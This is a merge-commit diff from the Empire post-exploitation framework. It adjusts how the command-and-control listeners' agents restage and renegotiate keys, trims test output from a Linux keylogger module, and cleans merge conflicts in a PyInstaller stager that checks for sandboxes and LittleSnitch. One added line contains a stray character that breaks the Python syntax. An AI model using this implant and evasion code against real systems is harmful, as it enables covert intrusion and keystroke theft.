Merge branch 'dev' of https://github.com/empireproject/empire into dev

m-j-w-69 · Oct 24, 2017 · ead8ce0 · ead8ce0
2 parents 627aaf2 + 2e5d805
commit ead8ce0
Show file tree

Hide file tree

Showing 7 changed files with 64 additions and 45 deletions.
diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py
@@ -18,6 +18,8 @@
 import subprocess
 from binascii import hexlify
 
+
+
 LANGUAGE = {
     'NONE' : 0,
     'POWERSHELL' : 1,
@@ -335,10 +337,10 @@ def __init__(self, key):
 
             tt = tk[KC - 1]
             tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
-                      (self.S[(tt >>  8) & 0xFF] << 16) ^
-                      (self.S[ tt        & 0xFF] <<  8) ^
-                       self.S[(tt >> 24) & 0xFF]        ^
-                      (self.rcon[rconpointer] << 24))
+                    (self.S[(tt >>  8) & 0xFF] << 16) ^
+                    (self.S[ tt        & 0xFF] <<  8) ^
+                    self.S[(tt >> 24) & 0xFF]        ^
+                    (self.rcon[rconpointer] << 24))
             rconpointer += 1
 
             if KC != 8:
@@ -352,9 +354,9 @@ def __init__(self, key):
                 tt = tk[KC // 2 - 1]
 
                 tk[KC // 2] ^= (self.S[ tt        & 0xFF]        ^
-                               (self.S[(tt >>  8) & 0xFF] <<  8) ^
-                               (self.S[(tt >> 16) & 0xFF] << 16) ^
-                               (self.S[(tt >> 24) & 0xFF] << 24))
+                            (self.S[(tt >>  8) & 0xFF] <<  8) ^
+                            (self.S[(tt >> 16) & 0xFF] << 16) ^
+                            (self.S[(tt >> 24) & 0xFF] << 24))
 
                 for i in xrange(KC // 2 + 1, KC):
                     tk[i] ^= tk[i - 1]
@@ -372,9 +374,9 @@ def __init__(self, key):
             for j in xrange(0, 4):
                 tt = self._Kd[r][j]
                 self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
-                                  self.U2[(tt >> 16) & 0xFF] ^
-                                  self.U3[(tt >>  8) & 0xFF] ^
-                                  self.U4[ tt        & 0xFF])
+                                self.U2[(tt >> 16) & 0xFF] ^
+                                self.U3[(tt >>  8) & 0xFF] ^
+                                self.U4[ tt        & 0xFF])
 
     def encrypt(self, plaintext):
         'Encrypt a block of plain text using the AES block cipher.'

diff --git a/lib/listeners/http.py b/lib/listeners/http.py
@@ -708,6 +708,10 @@ def generate_comms(self, listenerOptions, language=None):
                                 }
                                 catch [System.Net.WebException]{
                                     # exception posting data...
+                                    if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+                                        # restart key negotiation
+                                        Start-Negotiate -S "$ser" -SK $SK -UA $ua
+                                    }
                                 }
                             }
                         }
@@ -758,6 +762,10 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
+        
         return (HTTPError.code, '')
 
     except urllib2.URLError as URLerror:
@@ -801,13 +809,14 @@ def start_server(self, listenerOptions):
         self.app = app
 
 
-        @app.route('/<string:stagerURI>')
-        def send_stager(stagerURI):
-            if stagerURI:
-                launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
-                return launcher
-            else:
-                pass
+        #@app.route('/<string:stagerURI>')
+        #def send_stager(stagerURI):
+            #if stagerURI:
+                #launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
+                #return launcher
+            #else:
+                #pass
+
         @app.before_request
         def check_ip():
             """
@@ -882,7 +891,7 @@ def handle_get(request_uri):
 
                                 if 'not in cache' in results:
                                     # signal the client to restage
-                                    print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP))
+                                    print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
                                     return make_response(self.default_response(), 401)
                                 else:
                                     return make_response(self.default_response(), 200)

diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py
@@ -460,6 +460,10 @@ def generate_comms(self, listenerOptions, language=None):
                                 }
                                 catch [System.Net.WebException]{
                                     # exception posting data...
+                                    if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+                                        # restart key negotiation
+                                        Start-Negotiate -S "$ser" -SK $SK -UA $ua
+                                    }
                                 }
                             }
                         }

diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py
@@ -451,6 +451,10 @@ def generate_comms(self, listenerOptions, language=None):
                                 }
                                 catch [System.Net.WebException]{
                                     # exception posting data...
+                                    if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+                                        # restart key negotiation
+                                        Start-Negotiate -S "$ser" -SK $SK -UA $ua
+                                    }
                                 }
                             }
                         }
@@ -498,7 +502,9 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        r#if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
 
     except urllib2.URLError as URLerror:
         # if the server cannot be reached

diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py
@@ -419,6 +419,10 @@ def generate_comms(self, listenerOptions, language=None):
                                 }
                                 catch [System.Net.WebException]{
                                     # exception posting data...
+                                    if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+                                        # restart key negotiation
+                                        Start-Negotiate -S "$ser" -SK $SK -UA $ua
+                                    }
                                 }
                             }
                         }
@@ -466,7 +470,9 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
 
     except urllib2.URLError as URLerror:
         # if the server cannot be reached

diff --git a/lib/modules/python/collection/linux/xkeylogger.py b/lib/modules/python/collection/linux/xkeylogger.py
@@ -782,11 +782,6 @@ def to_keysyms(released, group, level):
     return u''.join(keys)
 run()
 
-x = 0
-while x < 4:
-    sleep(6)
-    job_message_buffer('test '+str(x)+'\\n')
-    x += 1
 job_message_buffer('[!] Keylogger exited\\n')
 
 """

diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py
@@ -1,11 +1,13 @@
 from lib.common import helpers
+import os
 
 """
 
 Install steps...
 
 - install pyInstaller
--- try: apt-get -y install python-pip && pip install pyinstaller
+-- try: 
+
 
 - copy into stagers directory
 -- ./Empire/lib/stagers/
@@ -42,21 +44,21 @@ def __init__(self, mainMenu, params=[]):
 				'Required'      :   True,
 				'Value'         :   ''
 			},
-      'Language' : {
-          'Description'   :   'Language of the stager to generate.',
-          'Required'      :   True,
-          'Value'         :   'python'
-      },
+			'Language' : {
+				'Description'   :   'Language of the stager to generate.',
+				'Required'      :   True,
+				'Value'         :   'python'
+			},
 			'BinaryFile' : {
 				'Description'   :   'File to output launcher to.',
 				'Required'      :   True,
 				'Value'         :   '/tmp/empire'
 			},
-      'SafeChecks' : {
-          'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
-          'Required'      :   True,
-          'Value'         :   'True'
-      },
+			'SafeChecks' : {
+				'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
+				'Required'      :   True,
+				'Value'         :   'True'
+			},
 			'Base64' : {
 				'Description'   :   'Switch. Base64 encode the output. Defaults to False.',
 				'Required'      :   True,
@@ -112,21 +114,16 @@ def generate(self):
 				self.conn = self.mainMenu.conn
 				# pull out the code install path from the database config
 				cur = self.conn.cursor()
-				#cur.execute("SELECT install_path FROM config")
-				#installPath_Str = cur.fetchone()[0]
+
 				cur.close()
 
-				import os
-#<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py
+
 				stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py"
-				#stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py")
-#=======
-				stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py")
-#>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py
+				stagerFFP_Str = os.path.join(self.mainMenu.installPath, "data/agent/stagers/http.py")
+
 				filesToExtractImportsFrom_List.append(stagerFFP_Str)
 
 				agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py"
-				#agentFFP_Str = os.path.join(installPath_Str, "data/agent/agent.py")
 				filesToExtractImportsFrom_List.append(agentFFP_Str)
 
 				imports_List = []